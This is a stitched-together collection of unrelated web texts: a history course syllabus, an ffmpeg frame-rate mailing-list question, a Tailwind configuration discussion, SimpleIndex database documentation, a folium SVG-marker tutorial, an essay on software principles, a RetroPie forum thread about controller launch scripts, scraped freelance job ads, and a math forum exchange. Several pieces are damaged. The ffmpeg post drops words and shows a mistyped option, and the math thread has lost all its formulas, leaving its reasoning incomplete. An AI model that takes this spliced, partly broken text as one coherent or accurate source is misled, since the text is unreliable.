- HIST 397-02W History Honors Tutorial - Instructor: Prof. Kyle B. Roberts (email@example.com) - Fall 2014 - T: 2:30 – 5 PM - Classroom: Piper Hall - Office: Crown Center 548 - Office hours: TBA The following texts can be found for rental or purchase at the University Bookstore in the Granada Center on Sheridan Road. Copies will also be placed on reserve in Cudahy Library. - Wayne C. Booth, Gregory G. Colomb, and Joseph M. Williams, The Craft of Research (3d ed.; 978-0226065663) Available online through Loyola. - William Strunk, Jr and E.B. White, The Elements of Style (3d ed.; 978-0205191581) - Michel-Rolph Trouillot, Silencing the Past: Power and the Production of History (978-0807043110) - Joan Tumblety, ed. Memory and History: Understanding Memory as Source and Subject (978-0415677127) Be prepared with readings and assignments as specified for each class session. If you do not hand in all the assigned preliminary work (bibliographies, notes, outlines) on time, your final paper grade (which is, in fact, your course grade) will be lowered by 2/3 grade (e.g. A to B+). If the first draft of your paper is not handed in on time, your final paper grade will automatically go down a whole grade (e.g. A to B). The same is true for the final draft. (If both come in late, your final paper grade [i.e. course grade] will go down by 2 whole grades, e.g. from A to C or B to D). If you hand in assignments or papers more than 2 days late, your final paper, no matter how good, won’t get more than a C. If you miss more than one class, your final grade will be lowered by 2/3 grade (e.g. from B to C+); if you miss more than 3 classes, your final grade will be lowered by a whole grade. If you have done more than one of these things, the penalty will be doubled or tripled. Organize your work-time accordingly! All papers should be written for this course. If you want to rework a paper that you wrote (or are in the process of writing) for another course, you must get special permission. If you do not get special permission, and if your professor discovers your deception, you will get an F in the course. Your “first draft” should be as close to final as you can make it. Work on its organization, style, and footnote form as much as its historical content. Read and re-read it before handing it in. You won’t get a real grade on the first draft, just lots of comments and suggestions. The final paper will be graded, and that will be your grade in the course. Consider a “significant paper” to be one about 20-25 pages long, not including footnotes/endnotes and bibliography. Margins should be 1″ all around; fonts should be Times New Roman 12 points, no smaller or larger. Be sure to double space, including box quotations. Whether a first or final draft, papers should be carefully proofread. Plagiarism will result in a final grade of F for the course as well as a letter, detailing the event, to be sent to the History Chair and the CAS Dean. I adopt the definition of plagiarism in Booth, p,. 192, namely that you plagiarize when: - You quote, paraphrase, or summarize a source but fail to cite it. - You use ideas or methods from a source but fail to cite it. - You use the exact words of a source and you do cite it, but you fail to put those words in quotation marks or in a block quotation. - You paraphrase a source and cite it, but you use words so similar to those of the source that anyone can see that as you paraphrased, you followed the source word by word. To avoid plagiarism, take notes carefully, putting into quotation marks all real quotes and summarizing other things in your own words. This is very hard to do; if you don’t do it right, it is better to have all your notes in quotes. The worst thing is to change around a few words from your source, not put quotation marks, and use your note as if it is a real summary: you will likely copy it out as it is on your card, and what you will have is in fact plagiarism, for changing around a word, a phrase, etc. is still plagiarism if it follows the thought sequence/pattern of the original. On the other hand, do not avoid plagiarism by making your paper a string of quotations: this produces a very bad, probably an F, paper, though it is not criminal. Nevertheless, do not let any of this prevent you from quoting your primary sources. As they are the “evidence” on which you build your case, you will want and need to quote them. Just put quotation marks around them (or set them as a box quotation) and follow the quote with a proper foot or endnote. Please be respectful and courteous of each other (and the instructor) at all times. In our search for truth, it is important to be able to ask tough questions and to suggest difficult answers on sensitive topics. Key to this is feeling comfortable, so please refrain from any behavior that would upset that balance. Students with learning disabilities should meet with the professor within the first two weeks of the semester to discuss the need for any special arrangements.
OPCFW_CODE
Using ffmpeg to halve frame rate richard22j at zoho.com Sun Apr 15 09:18:08 PDT 2018 A couple of years ago there were problems with HLS and there was speculation that we might have 50 fps HVFhd and DVFhd as the only HD modes. At that time I wondered if it would be feasible to drop every other frame to reduce the frame rte to 25 fps. I thought because of the H.264 delta encoding it would probably mean transcoding and that it would be too slow. On a 42" screen for the programmes that I usually watch I cannot see any difference between a HD picture at 50 fps and one at 25 fps, so 50 fps for me is just a waste of bandwidth and storage space, so I have been looking at it again. The ffmpeg documentation at 5.5 Video Options says for -r "As an output option, duplicate or drop input frames to achieve constant output frame rate fps." That would be very useful if it means there is no need for transcoding. I found this example. The command I used for the first suggestion, with re-encoding, was ffmpeg -i am.mp4 -vf "setpts=PTS" -f 25 am4.mp4 That worked and kept the audio. It was slow, taking about 1.5 times real time. Also the bit rate at about 1.4Mbit/s was only about two-thirds of what I was expecting, so it may have been more compressed than the original. I had first tried "setpts=0.5*PTS" but that produced a file which played at twice speed and "setpts=2*PTS" which played at For the second example without re-encoding my commands were ffmpeg -i am.mp4 -c copy -f h264 am1.h264 ffmpeg -i am1.h264 -c copy -r 25 am2.mp4 There was no audio, although that can be added back later. It was quite quick, at about a fiftieth of real time. It did not achieve any reduction in file size or bit rate. and the frame rate remained at 50 fps, so the -r 25 had been ignored. I did get lots of error messages saying "pts has no value" so maybe I need to set that. I did try repeating the -vf parameter from the first command it said, Filtergraph 'setpts=PTS' was defined for video output stream 0:0 but codec copy was selected. Filtering and streamcopy cannot be used together. The second example from the stackoverflow page placed the parameter -r=25 before -i. I tried that. There was no reduction in file size but the time was made twice as long and the file played at half speed. As I understand it, placing the parameter in that position made it an input Has anyone managed to get ffmpeg to halve the frame rate without re-encoding? Can it be applied to the raw .ts output? More information about the get_iplayer
OPCFW_CODE
Update tailwind config Add theme's content/*.htm files to tailwind config. Why would we need to consider the Winter.Pages content when generating the styles? Why would we need to consider the Winter.Pages content when generating the styles? Well, static page can define some content with Tailwind classes. Two use cases : Custom page fields : They can define dropdown fields with options related to tailwind classes. padding: '': 'Default' 'py-0': '0' 'py-4': '4' 'py-8': '8' 'py-10': '10' 'py-12': '12' 'py-16': '16' 'py-20': '20' Blocks of Winter Blocks plugin : https://github.com/wintercms/wn-blocks-plugin/blob/4ea3447ab924de737290aadc272888c8a4ed0810/blocks/image.block#L20-L24 And https://github.com/wintercms/wn-blocks-plugin/blob/4ea3447ab924de737290aadc272888c8a4ed0810/blocks/image.block#L27 Without forgetting that the content can be generated from the backend of the site in CMS/Content. That's why I thought it would be useful to include this directory in the list of those considered by Tailwind by default. @damsfx if the layout provides a tailwindcss class for the pages plugin to use then you need to include it in the layout in such a way that the CSS compiler can detect it. The same applies for blocks. Thus, just including blocks and layouts should trigger tailwind to generate the necessary classes to support any actual content being rendered by those templates. @damsfx no worries, it took me a bit to figure out at first too. My point is that Tailwind will be able to pick up the need for w-full to be generated simply by the inclusion of the *.block files in the asset compilation step, rather than needing the content files themselves to be included at that point. When you include *.block, Tailwind will see the lines where those options are defined and treat them as an inclusion of that class that it needs to process (see https://github.com/wintercms/wn-blocks-plugin/blob/main/blocks/button_group.block#L27-L28). That means that all you should have to do is include the blocks folders and the layout folders and you're good to go; unless for some reason you have a field that allows for arbitrary content from the user. In some cases, you may need to do a slight workaround in your block file; i.e. for the example of a custom Froala dropdown where those dropdown values are defined elsewhere in the project (whether that's the DB or perhaps in some JS somewhere), then you could do the following: name: richtext form: fields: content: buttons: [myCustomFontButton] == {# Include the following classes used by the content -> myCustomFontButton setting py-0 py-2 py-4 ... // etc #} <div>{{ data.content | raw }}</div> Does that kind of make sense? Is there a better way that could be introduced or documented so it's easier to understand / implement? That means that all you should have to do is include the blocks folders and the layout folders and you're good to go; unless for some reason you have a field that allows for arbitrary content from the user. Indeed I have this type fields. I also have repeated field declarations for the static page plugin that use dropdown fields to choose a value. Does that kind of make sense? Is there a better way that could be introduced or documented so it's easier to understand / implement? Yes it makes sense ! In my case, here are the paths that I systematically use in the Taliwind configuration: ./configs/**/*.yaml ./content/**/*.htm ./layouts/**/*.htm ./pages/**/*.htm ./partials/**/*.htm And now I add the blocks defined in the plugins or the theme. So I think we can close this RP. Sounds good, although I really would recommend not including your content folder to force you to ensure that it's setup to handle the styles being included without having to have your content itself being scanned for styles. That way you can have a more portable deployment that doesn't rely on all of the content being present in the repo when the build script is run to continue to work well.
GITHUB_ARCHIVE
...larger project of transport, carpooling and logistics service. This project will be the best in Canada with its innovative services. During this project development, I viewed many websites of this service that are missing several services availables on our platform (financial management / marketplace + banking / accounting / online payments: paypal ...at least one other language. - experience in web development with good knowledge in frameworks such as ExtJS, Zend Framework, Doctrine & Smarty - presentable record in building modular, reusable, and well-documented code - working knowledge of the Git version control system and its preferred development workflows - Good organisational skills of time and ...Overall, the design must not use any stock photos of people, the design must be about our product and its benefits and features, not random people images from stock photo websites. The new website must be implemented using Page Builder ([se connecter pour voir l'URL]) in WordPress. The new website must use our current logo (logo pack attached) ...responsive HTML pages of the website and won't be released till all the pages are working fine in desktop and devices 2) The second milestone is 150$ which will include the development CMS phase and testing as well * We don't pay an advanced payments *** Website Summary*** - Homepage: Rotating banners for the main products, certificates, history, services Seeking individual who has experience with WooZone, eCommerce, Yoast SEO, SEO data entry, web scrapping, web development and Wordpress along with Amazon product search. My site currently needs specific products to be imported on a weekly to B-weekly basis. This will be on an Amazon Affiliate website with a specific niche genre. The candidate will need I need a webmaster who is also a developer to maintain websites i host on behalf of my clients on a monthly or bi-monthly basis. I need someone who is willing to work for a fixed fee to be paid once a month and send reports to prove work has been performed. I have about 5 websites that need this. Need to be able to: • Make all necessary plugin updates Logo for website design company name "VG infotec" VG infotec working with websites design and software development. ...upwork, Guru,PPH,Freelancer etc Candidate should know to write proposals for projects Setup portfolio on websites and get projects through these websites Should be comfortable in client interaction Should have prior experience in software or Web Development Company. Candidates should be dynamic enough to achieve our monthly or quarterly targets. Commission ...maintain complex forms for mobile and desktop web apps, with a focus on performance. The incumbent main duties will include modifying and creating and maintain the existing websites/applications and integrating with third-party plugin for statistics. Attention to detail, clean coding standards, and best coding practices are required. Roles and responsibility: Looking for professional content crea...Experience and skill: Minimum 2 years experience in web design and development with skill in PHP, HTML 5. Use in framework such as Joomla, Codeignighter with builtin securiy features. Ability to communicate fluently in English is an absolute necessity. Must be able to show similar websites that you have created. ...articles. One for websites and then the other one is to go in our newsletter to increase upsell our products to offices only using 1 or 2 of our products. Most of the research done already. One will be for the benefit of using all our products vs using multiple software’s, the other would be top reasons to use purpose built real estate websites with portal I want a person who can find the development projects from all over the world over freelancer, upward etc etc websites and deliver to the company. freelancer should be good in English and professional. ...YOUR BIDS IF YOU ARE PLACING YOUR BID BEFORE READING THE PROJECT IT MEANS YOU ARE NOT PAYING ATTENTION TO SMALL DETAILS. This is the first phase for the project – development of social media sites. After this project is completed the new project will be awarded hopefully to the same employee for outgoing monthly hosing and advertising services ...information about our company: As part of a varied assessment process at Project Human Resources, we offer Psychometric Testing. It can be used in pre-employment screening, team development, conflict resolution and individual performance enhancement. Project Human Resources employs experts in the administration and interpretation of psychometric assessments ...started growing out from a small development company determined to help business around New Zealand. About the role: An exciting and newly created role with no boundaries for great ideas. Have real autonomy and ownership all things website design and development related. Key Responsibilities: Design and develop websites for small business and online Require a python developer to code up a module which extracts all articles on a stock symbols from a series of websites for a given date range. Expected capability of the module to extract data with input as different website names. The output is the generation of an excel file with which has the link of the article, text data, and corresponding figures ...Blockchain and AI. If you can design and develop an extraordinary website, you'll get the award + future projects for web design and development (1 eCommerce site immediately). We like some of design of these websites that you can get an idea about our taste. However, it does not have to be similar, but it SHOULD amaze us! [se connecter pour voir l'URL]
OPCFW_CODE
Back to Settings Wizard The Database page lets you configure a database to export index data and images. You can also use a database to search and view existing files. Configuration of the database settings is similar to the Job Options screen. Index field mappings have been moved to the index field wizard. Use this screen to configure the data source connection, target table and special fields. Database Design Overview This overview will help you understand the overall database configuration scheme. The sections that follow give detailed descriptions of how to configure each setting on the database page. The database interface with SimpleIndex was designed to provide low-level interaction with any database to provide a wide variety of new functionality for a multi-user environment. Most document capture software comes with its own internal database that is used to manage scanned batches and index values until they are exported. SimpleIndex saves index data directly to fields in your database, giving you instant access to new images as they are being processed. This also allows SimpleIndex to work directly with custom database programs without any custom programming. - When images are scanned, records must be “inserted” into the database to store the image file location and pre-indexed data. - Manual indexing is done by retrieving a batch of records on another workstation and “updating” them with the correct index data. - Users may view scanned images by “retrieving” them from the database based on index criteria and viewing the matching documents. - Existing database records can be updated in batches, linking files and updating index fields automatically. Processing stages can be tracked using the Revision Level field. This field keeps track of how many times a document has been processed (scanning, indexing, double-key verification, QC review, etc.) as well as who is currently working on a document. SimpleIndex assumes the database is configured to have a single table or view that contains all the index fields and a field to store the path to the image file. See Database Mode. Table or View SimpleIndex is designed to store index information and the path to the image files in a single table or query. Select a table or query that will store this information here. To use SimpleIndex in Insert Mode, the table or query must have a primary key that is generated automatically (Autonumber, GUID, etc.). Use the Load button after you have entered the name of your table to load the field selectors with a list of the available fields from that table. It is possible to use a query (also called a view) that allows you to store index information and image data in separate tables. Depending on the database type, there are constraints on the field relationships necessary to create a query that supports inserting and updating. Please ensure your query is updatable before using it with SimpleIndex. Consult your database documentation for more information on creating updateable queries. Output File Field The Output File Field is used to store the path to the image file corresponding to the current record. It is recommended that you use the relative path instead of the full path to store the image filename. Doing this allows you to move the images to another storage server without having to perform a complex update on this field to reflect the change. Uncheck the Output full path to exported files option to store the relative path, leaving off the Output folder. If the images move, you only need to enter the new path in the Input and Output folders of your SimpleIndex configuration files to make your document management system work in the new location. File Type Field This field stores the file extension for each file. It is designed to be used when storing files as binary objects to allow SimpleIndex to determine what type of file the data represents, so it can be displayed in the correct viewer. Rename Files in Update Mode This option will cause saved images in Update mode to be moved from the Input folder to the Output folder, and renamed using the subfolder and filename determined by the Index settings. This makes it possible to do a variety of 2-stage indexing processes. Some examples are: - Scan and create multi-page files with separator sheets, then index and rename those files with Update mode. - Use scheduled OCR to automatically index fields and Update mode to correct OCR mistakes and move files to their destination - Keep files in a temporary location during processing and move to a production server once indexing is complete Skip Insert if output File Exists When you scan using the same configuration with the same index values, images are appended to the existing files. In most cases, you do not want another record created in the database for the same file. Check this box to prevent these duplicate records from being created. Store Files as Binary Objects Check this option to store the file data in the database field defined in the Output File Field instead of the default behavior, which is to save the path to the external file in this field. This allows all data to be stored within the database server without the need for separate files on the network. Use the File Type Field setting to indicate the file type for documents stored in the database. In Retrieval and Update modes, this is used to determine the proper viewer to display the file in. Remove Local Copy After Export Uncheck this option to keep a copy of the exported files in the Output folder after they have been saved to the database as a binary object. The Revision Field is used to indicate different queues that can be used for different types of processing. In Insert mode, the Revision Level value you enter is stored in the selected field. In Update mode, the user retrieves only images that match the selected Revision Level, and this value is incremented by 1 whenever the user saves an index value using the Save Index button. By incrementing the value of the Revision Level, it is possible to tell which stage of processing each image is in. Typically, scanners will insert records with a Revision Level of 0. Indexers then update these records with the field information and increment the level to 1. Double-key indexers or QC reviewers finally update the level to 2, indicating that processing is complete. Database stored procedures may then be implemented to move records with a level of 2 to a table on a production server if necessary. IMPORTANT! The Revision Field must be defined as a text/varchar data type and not an Integer! When used in Update mode, SimpleIndex “checks out” each batch to the current user by setting the Revision Field temporarily to the user’s ID, preventing the records from showing up in another user’s batches. For this reason, the Revision Field must be a multi-character data type with sufficient length to store the User ID. Full Text OCR Field This will associate the image file and index information with the text of the document inside your database, making full-text search possible. Page Count Field If using Insert mode, this setting allows you to specify the name of a number field to use to store the page count for each file. Sort By Field Data Source Configuration Wizard See Data Source Database Settings Training Video Video was recorded in a previous version of SimpleIndex. Refer to the wiki documentation for latest updates. Related Knowledge Base Articles - Database Export Error - Using alternate database schemas - How do I setup Simpleindex to use a Database table field as a list file when the table is not the same as the table i am using on the Database Tab. - If it possible for index values to be keyed twice to ensure accuracy (double-key verification)? - Is it possible to have the scanned image itself added to a database and not just the image path? - When exporting to a database, I get the error “Multi-step operation generated errors” - How do you configure full text searching in Retrieval mode? - How do I connect to an SQL Server database? - How do I connect to an existing Access database? - I know nothing about databases. Can I still use the database and Retrieval Mode features? Next Step Indexing & File Naming
OPCFW_CODE
Mapping renewable power plants in Argentina — Dynamic SVG marker creation in folium While going through some Kaggle exercises on data analysis, I found out about the folium library. It is quite an interesting tool, allowing you to add layers to existing open-source maps and display them on HTML. I decided to create a map to show some data from my country. I found this dataset that contains data about every renewable energy project that the country manages. Sadly this means that shared projects such as Yacyretá, managed by Argentina and Paraguay, are not present in the dataset. The dataset is available here. I used Python and the folium library to show the data. Folium generates leaflet code, an excellent mapping library. A jupyter notebook with the code is available in my repository, here. The dataset contains many columns but I used only the following ones: - Proyecto: Name of the project. - Tecnologia: The type of power plant, classified by source. For example biomass, eolic, solar, etc. - Potencia_mw: The amount of power that each plant produces or will produce, in megawatts. - Latitude, longitude: Latitude and longitude of the plant. - Avance: this is a numerical column in the range 0–1 that tells us the percentage of completion of the project. 1 means a working, operative plant. 0.5 would mean that only half of the place has been built. The dataset has 282 rows but I will be using only the plants that have more than 0 percentage of completion. This data is not complete. It only includes some plants that are part of a project called “Renovar” that was operative a few years ago. In fact, many of the plants shown on the map as “in construction” are not in active construction right now. I decided to show the different types of plants using different colors. The amount of power and name of the plant would be shown in a popup when clicking on a marker. Marker cluster groups markers that are close when the map is seen at a low zoom level. This results in a map that has little clutter on it. Something in the last picture may have caught your eye. Why do we have that “PacMan” shaped marker? That is the way I chose to showcase plants that are not fully finished. A partial circle. If a plant is only finished by 25%, only 25% of the circle will be shown. Many tutorials go through the main stages of creating a map in folium. I will instead focus on slightly more complex issues that arise when trying to build personalized maps. If you have never used folium, I can recommend the documentation. It is a very good starting point. After plotting your data, you will usually have a set of layers. Every layer will have been added to the map, and every data point will be part of a layer. For this project, I have used MarkerClusters as layers, to combine these two utilities. MarkerClusters behave like layers in every regard and add extra functionalities. I trust that you will manage to do this part with no complications and if they arise, there are good resources online on how to handle them. The complex part for me started when I wanted custom markers that would be different depending on the data. The goal for the markers was to show the completeness of each project on partial circles. One approach, of course, would be to pre-render 100 partial circles with different levels of completeness. This approach is not as bad as it may seem. These images would be fairly small, and you could pick them from an array and use them. However, I didn’t do this. I wanted to create the marker dynamically. Folium allows you to use HTML to create a marker. This is a good start. You can make circles using just HTML, creating a div and playing with its border-radius. Googling a bit will also reveal different amounts of dark magic used that would let you build many different shapes just using HTML and CSS. Instead, I decided to use SVG. It stands for Simple Vector Graphics and, as its name implies, it defines an image using vectors instead of pixels. This means that as long as you can represent your figure through some type of mathematical operation, you will be able to create a function that will give you your desired figure. To understand how SVG works, I recommend this tutorial at w3schools. SVG has predefined operations as HTML tags. For example, you can make a circle like this: <svg width="100" height="100"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="1"/> This gets us closer to the solution. SVG does have many tags to create different basic shapes. Sadly, you will soon find that to build complex images, you will need to combine the simpler tools. What is needed, is a Path. It allows you to use basic shapes in succession to create your figure. The link of w3schools should help you to get acquainted with the available shapes and how to represent them in SVG notation. This is the part when it gets a little daunting. This tool helps a lot in visualizing the results. Making a circle section only required three SVG operations: Move, Line, and Arc. Let’s describe them: - Move X Y: this will move the “SVG pointer” to the desired position, relative to the current position. - Line X Y: it will make a line from whenever your pointer is to the position (X, Y), relative to your position. Before jumping to the Arc, let us see some examples of these two operations: This screenshot comes from the tool I recommended for SVG Paths. In this path, we moved to the position (10,10), and from there, we drew a line 10 pixels below and 20 pixels to the right. Every operator receives a position that is relative to the position of the pointer. The pointer starts at (0,0), the top left corner of the image. A final example of using the line operator. In the end, I used the Z operator, which makes a line to the first position where something was drawn on the screen. Now that we are more at ease with SVG (It took me more than just making a triangle to understand it, so I would totally understand if you want to stay here and play a bit with the other operators), we will jump to the Arc operator Arc radiusx, radiusy, x_axis_rotation, large_arc, direction, final_x, final_y Let’s process this one parameter at a time. Before we start, I will place this image showing the parts of an ellipse, to have a quick reference method: Radius_x defines, assuming an ellipse such as the one in the image, the distance between the center and the vertex. Radius_y is the distance between the center and the co-vertex. If these two values are equal, we will have a part of a circle. If not, we will have a section of the border of an ellipse. Final_x and Final_y define the position of a point that belongs to the ellipse. Another point is given by the starting position of the SVG pointer. Having a start, an end, and two radius points, we have 4 possible arcs: This image will help us to understand these two parameters. If large_arc is 0, it will consider these two points as being closer to the vertexes of the ellipse. On 1, it will consider itself on the other possible position in the arc, farther away from its central point. The direction flag will initiate the arc either clockwise or counterclockwise. Finally, the x_axis_rotation value will rotate the vertexes of the ellipse. Now that we know how to use Move, Line and Arc, how do we use them to create our special marker? The goal is, starting with a number that goes from 0 to 1, to have something like this: Before executing the Arc, we need to move the pointer to the center of the circular section and create a vertical line. Then, we need a circular arc. Radius_x and radius_y will always be equal. No need to use x_axis_rotation either. The direction will always be clockwise. So we will only be interested in x, y, and large_arc. Things do look simpler now, don’t they? Going from a value in [0–1] to an angle in degrees would be the first step. 100% completion is 360º. 50% completion, 0.5, would be 180º. And so on. Then, to get (x,y) coordinates, we convert our angle to cartesian coordinates, having a fixed norm, called radius in this function below. We need to keep track of the starting point because we don’t calculate the (x,y) position based on the current SVG pointer but on the center of the circle section. The following graph shows this: We can define a function to make the whole SVG path now Some experiments led me to realize that if the angle goes above 180 you will need the big_arc flag to be 1. In hindsight, this is because whenever you go farther than 180 degrees, the center of the arc, transported to the ellipse in which the operation is based, would have to be closer to the vertex being drawn. Now we can add our SVG to the markers: A marker in folium has many attributes. Location is quite mandatory. Popup will, as its name indicates, give us a small popup when we click on the marker. Icon is the one we have been working towards. Here we pass a DivIcon instance, that can receive HTML as a parameter. Inside a div, we pass an SVG tag with the path that our function “describeArc” gives us. Some of the errors I made while going through this: - Not adding width and height to the SVG tag. This had the effect of making every marker 350x100. Although it did not change the visual size of the SVG, it did change the clickable area of the marker, and thus it was rather uncomfortable to use the map. - Not checking the correctness of the HTML code: The code will run even if the HTML is lacking a closing bracket or a quotation mark or whatever other problem you can imagine. Your mileage in resulting icons may vary a lot. The actual project includes multilevel layering using MarkerCluster and subselectors. The map was exported to HTML and added to my personal website. These other parts of the project are well explained on the folium docs and that is why I don't explain them here at length. You can check the final result here: Hydroelectric Map of Argentina This map shows the location of the renewable power plants in Argentina. The data is provided by the argentinian… Thanks for reading!
OPCFW_CODE
“You cannot do that! It violates X principle…” I have heard this statement countless times in my career. At first, when I was still young and clueless, I would feel dirty, like I have committed a mortal sin on which the software gods looked away in disgust. As I went on in my career, I began to question such statements. Did I violate a principle? Am I not using the best practice? Does this best practice apply to what I am doing? Some of the time the answer to that question is yes, but in most cases I have found it not to be the case. In this very short post I am going to talk about the importance of context in software engineering. The Buzz Words Plague The software engineering world never runs out of buzz words. Everyday there is something cool. A better way to do something — a best practice. I have witnessed in awe as my fellow professionals (and myself sometimes) flock to the new shiny thing, shunning yesterday’s best practices for the most relevant. All of a sudden, that which was once a best practice has instantaneously morphed into an anti pattern. Again, in some cases that is true. With the constant improvements in technology some of the things that we held in high regard are no longer relevant. However, in most cases, we fall in the trap of going wherever the wind is blowing, blindly applying solutions where they don’t apply. Principles, Patterns And Best Practices What are software development principles? Software development principles are a set of guidelines that help software engineers write quality, maintainable software. They come about naturally as we encounter similar problems or as we repeatedly make the same mistakes. They provide templates or guides to solve recurring problems. I will using principles and patterns interchangeably in this post though I think they are slightly different. Take the Don’t Repeat Yourself (DRY) principle for instance. It is a result of people getting caught out when all of a sudden they are required to change the same logic that’s scattered all over their codebase. It’s definitely a good guideline. But is it the law? Certainly not! Best practices on the other hand, are things that I find mostly misused or dare I say, abused, in the software engineering industry. What is a best practice anyway? To me, a best a practice is something that solves a particular problem better than other options (that the person has managed to come up with). I try to avoid the word best because chances are there is a better way of solving that problem. Are best practices bad? Not if they are applied correctly to the problems that suit them. This is where context comes in. The Importance Of Context Like they say, the best answer in software engineering ‘is it depends’. There is an opportunity cost to every decision we make. Everything has a tradeoff. Choosing which best practice or pattern to use should always be made within the context of the problem space. Not all problems are the same. They may appear similar at face value, which usually leads to incorrectly applying a solution that doesn’t efficiently or effectively solve the problem. The pattern (or best practice) that worked on your previous project won’t necessarily apply to the next. Should you repeat yourself (violating the DRY principle)? Probably not, but if, in your context, you need to do so, please go ahead. I have witnessed two pieces of logic that appear similar initially, diverge as the project grows and requirements change. Context matters. I have countless partial projects on GitHub, most of them trying to solve the same problem using whatever the buzz word was at that moment — Clean Architecture, DDD, microservices, you name it. Most of the time I stopped midway because of pure laziness. However, in some cases I just hit a brick wall when I realised that I was over engineering the solution while trying to follow the best practice. Certainly that best practice/pattern didn’t fit my problem space very well. Am I saying patterns, principles and good practices are a bad thing? No. They are very useful and most of the time help us avoid banging our heads against the wall while try to solve certain problems. However, they should not be applied blindly without taking into consideration the context. Context is king! I would like to hear what your opinion is on this topic. Please feel free to leave a comment below. Thanks so much for taking your time to read.
OPCFW_CODE
Tagged: Input RetroPie Emulationstation 10/09/2015 at 18:11 #107528 I installed RetroPie/es as a standalone environment on top of a fresh Wheezy install. As a way to help myself be able to use my Pi without a keyboard, I created a script to launch ES by pressing RB on my controller. As a way to make sure my controller or xboxdrv werenn’t causing conflicts, I made a separate testing script that was literally just a hashbang with the command “Emulationstation” When running that test script, All input, be it by controller or keyboard, is extremely glitchy when opening RetroPie Setup from within ES, or launch options for ROMs. The glitchy input is also seen being accepted by the terminal in background, some of which actually bleeds through over the menus. However, if I manually type “Emulationstation” as a command in terminal to launch it, none of this happens. Maybe Emulationstation needs to be launched with a more complex argument or parameter when launching via script like that, but I am not sure. If you would like, I can make a short video showing the behavior and post it here -Fresh Raspbian Wheezy install (latest version before Jessie release) with RetroPie installed as a standalone environment. -RPI 2 B -OC’d using RPI 2 preset in Raapi-config -Used latest RetroPie-setup script from github. -Currently, my /root partition is stored on an external HDD, but I had these issues even when working solely on MicroSD. EDIT: A video of what goes on. https://vid.me/Vo3p10/09/2015 at 18:31 #107529 Please post your scripts, including details on how the script gets launched etc. note that “emulationstation” is a script itself – the executable is in /opt/retropie/supplementary/emulationstation so you should probably call it directly if launching from some custom code.10/09/2015 at 18:37 #107531 For testing purposes, I executing via bash by typing If I launch Emulationstation manually like this: The bug does not exist. The end-goal is to have it bound to RB on my controller. But for now I need to be able to figure out how to avoid this bug when launching via script. This is the script I wrote that is executed when pressing RB on the controller: echo “$(tput setaf 2)Cleaning up…$(tput sgr 0)” sudo killall emulationstation sudo killall -9 retroarch sudo killall -9 kodi.bin sudo killall xboxdrv xboxdrv –trigger-as-button –wid 0 –led 3 –detach-kernel-driver –ui-buttonmap RB=exec:/home/pi/emu.sh –ui-buttonmap LB=exec:/home/pi/kodi.sh –ui-buttonmap GUIDE=exec:/home/pi/killswitch.sh –quiet –silent & sleep 1 fbset -depth 8 && fbset -depth 16 echo “$(tput setaf 2)Ready.” echo “Launching Emulationstation. Game on.$(tput sgr 0)” emulationstation10/09/2015 at 18:42 #107532 Just noticed your suggestion about calling it directly. I didn’t realize the “Emulationstation” call was itself a script. That /could/ be it, but the weird part is I have a similar script for Kodi and it is called the same way. In fact the dev of Kodi explicitly states to call using the “startkodi” script he provides and to not call it directly, so I couldn’t say if your suggestion is right until I can test it.10/09/2015 at 18:50 #107536 What code would you say I should use to call it directly?10/09/2015 at 19:10 #107537 Oh your script is not being launched from a tty – so that’s why. launch emulationstation with /dev/tty on the end ? or run your script with the above from whatever is triggering it.10/09/2015 at 19:27 #107539 could be related to backgrounding the xboxdrv also – run it with –daemon parameter and remove the ampersand ?10/09/2015 at 19:40 #107542 So then change the line that says I tried that just now, and although ES launched, the issue is still there.10/09/2015 at 19:46 #107545 Well remember, even if I just run a test script that contains This still happens. Effectively eliminating xboxdrv interference.10/09/2015 at 19:48 #107546 you probably still have it running in the background – did you check ? Maybe you have multiple copies running now 🙂10/09/2015 at 19:49 #107547 Also – did you try launching the ES binary directly ?10/09/2015 at 20:25 #107552 So if xboxdrv doesn’t run at all, it functions fine, but that removes my ability to attach commands to the controller buttons which is the whole purpose of my script– to be able to send a kill command to ES in order to launch Kodi, effectively eliminating the need for a keyboard. Sure it squashes the input bug, but makes my scripts pointless.10/09/2015 at 20:26 #107553 Launching directly made no difference.10/09/2015 at 20:39 #107554 Wait a minute. What if I just launch xboxdrv in /dev/tty ?10/09/2015 at 20:48 #107555 have you tried launching xboxdrv manually with –daemon and then trying the simple script ? are you testing this on the machine itself or via ssh ?10/09/2015 at 20:51 #107556 On the machine. I know SSH can cause issues. I’ll try that next when my son calms down.10/09/2015 at 23:03 #107560 Daemon won’t run. ‘internal signalling write failed’ libusbx10/09/2015 at 23:12 #107561 Also, I have a hunch about something. Do you know how to tell it to emulate the press of the “enter” key via bash script? I feel like that may have something to do with it, based on having to press enter to get a ‘pi@raspberrypi’ prompt to show up after executing a different, unrelated script.10/10/2015 at 19:21 #107614 Forums are currently read only - please visit the new RetroPie forums at https://retropie.org.uk/forums/
OPCFW_CODE
Hmm... it seems that there are also other possibilites. The last element may be 3 if is divisible by 3, 4 if it is divisible by 4 and so on. It seems to be going on infinitely... How should I solve it, then? Find all such sequences consisting of different positive integers that for the number is a divisor of and is a divisor of . The consecutive elements of the sequence can't be more than 1 smaller compared to the previous as the previous wouldn't be able to be their divisor, then. I mean, this sequence works: because, as a matter of fact, we're still checking divisibility of the same numbers (62 and 61+1 which is 62 and so on) and, as 1 is the 62nd element, it can, of course, divide the first which has to be an integer. As a matter of fact, this should work for every sequence like: or even with 2 at the end, supposing k is even. But what else? I'm stuck here. Well, you've done a good job so far. Let's formalize what we know a little more: Suppose we let . Then we know . Our condition is that the last term is a factor of the first term plus 1. Another way of saying that is that is an integer. So we have to find all the integer solutions for the equation The question is how to do it. There are finitely many solutions. That should be clear because ultimately the numerator and the denominator will be too close (and thus not be factors) if you proceed too far in either the positive or negative direction. That means trial and error could work if you're patient enough. A better way of doing it is noticing that we can rewrite the equation as: Find all the pairs of factors, and you will find that this is the same as saying that must be a factor of 63. Thus we have all the sequences of the form you mentioned whose last term if a factor of 63. Thank you. But is there any other way to solve the equation you mentioned than plain brute force? Also, can I write the fact that every element must differ by 1 just out of thin air or I have to prove it somehow? I mean, the problem description doesn't make us work on any monotonic sequence so isn't supposing it's descending by 1 at a time a little like starting from a special case? Sorry for not replying earlier... the equation actually allows you to skip the use of brute force. Maybe I didn't make this clear enough. But , plus our assumptions about and , means that and must be integers. Therefore, we KNOW already that is a factor of 63, without having to do any work. In terms of the proving that every sequence is of the form you mentioned, I think it's possible, but I haven't 